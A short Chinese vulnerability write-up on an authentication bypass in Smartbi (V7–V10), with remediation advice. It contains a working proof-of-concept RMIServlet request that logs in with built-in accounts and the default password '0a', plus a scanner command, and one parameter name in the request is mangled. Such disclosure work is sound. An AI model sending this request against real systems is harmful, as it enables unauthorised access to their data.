Smartbi 身份认证绕过漏洞

0x00 简介

Smartbi是广州思迈特软件有限公司旗下的商业智能BI和数据分析产品，致力于为企业客户提供一站式商业智能解决方案。

0x01 漏洞概述

Smartbi在安装时会内置三个用户（public、service、system），在使用特定接口时，可绕过用户身份认证机制获取其身份凭证，随后可使用获取的身份凭证调用后台接口，未经身份验证的攻击者通过该漏洞可获取系统中敏感信息。

0x02 影响版本

V7 <= Smartbi <= V10
0x03漏洞复现
访问目标环境

poc如下

POST /smartbi/vision/RMIServlet
Host:
className=UserService&methodName=loginFromDB¶ms=["service","0a"]

GET请求报错，可能存在漏洞

POST请求，这里使用的是service，内置三个用户（public、service、system），口令都为0a

xpoc -r 105 -t 校验存在漏洞

0x04 修复方式

官方措施：
官方已发布修复方案，受影响的用户建议及时下载补丁包进行漏洞修复https://www.smartbi.com.cn/patchinfo
临时措施
在确认不影响业务的前提下，修改内置账号(public、service、system)的默认密文(默认值为0a)，或者删除内置账号。非必要尽量不让服务部暴露在公网。